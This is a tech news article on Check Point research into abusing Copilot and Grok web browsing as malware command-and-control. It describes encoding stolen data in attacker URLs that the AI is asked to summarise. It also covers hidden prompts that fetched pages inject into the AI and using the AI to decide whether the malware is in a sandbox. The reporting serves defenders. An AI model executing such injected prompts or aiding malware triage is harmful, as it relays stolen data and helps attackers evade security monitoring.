'AI assistants are no longer just productivity tools; they are becoming part of the infrastructure that malware can abuse': Experts warn Copilot and Grok can be hijacked to spread malware

2 hours ago 5
Half man, half AI. (Image credit: Shutterstock)

  • Check Point warns GenAI tools can be abused as C2 infrastructure
  • Malware can hide traffic by encoding data into attacker-controlled URLs via AI queries
  • AI assistants may act as decision engines, enabling stealthy, adaptive malware operations

Hackers can use some Generative Artificial Intelligence (GenAI) tools as command-and-control (C2) infrastructure, hiding malicious traffic in plain sight and even using them as decision-making engines, experts have warned.

Research from Check Point claims Microsoft Copilot and xAI Grok’s web browsing capabilities can be leveraged for malicious activity, although some prerequisites remain.

Deploying malware on a device is just half the work. That malware still needs to be instructed what to do, and the results of those instructions still need to be sent out through the internet. Security solutions can pick up on this traffic and that way determine if a device is compromised or not - which is why “blending with legitimate traffic” is one of the key features of high-quality malware - and now, Check Point says that there is a way to do that through AI assistants.

Harvesting sensitive data and getting further instructions

If a threat actor infects a device with malware, it can harvest sensitive data and system information, encode it, and insert it into a URL controlled by the attacker. For example, http://malicious-site.com/report?data=12345678, where the data= part contains the sensitive information.

Then, the malware can instruct the AI: “Summarize the contents of this website”. Since this is legitimate AI traffic, it doesn’t trigger any security alarms. However, the information gets logged on the attacker-controlled server, successfully relaying it in plain sight. To make matters worse, the website can respond with a hidden prompt that the AI executes.

The problem can escalate further if the malware asks AI what to do next. For example, it can ask, based on the system information it harvested, if it’s running in a high-value enterprise system, or a sandbox. If it’s the latter, the malware can stay dormant. If it’s not, it can proceed to stage two.

“Once AI services can be used as a stealthy transport layer, the same interface can also carry prompts and model outputs that act as an external decision engine, a stepping stone toward AI-Driven implants and AIOps-style C2 that automate triage, targeting, and operational choices in real time,” Check Point concluded.

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!


Best antivirus software header

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!

And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.

Read Entire Article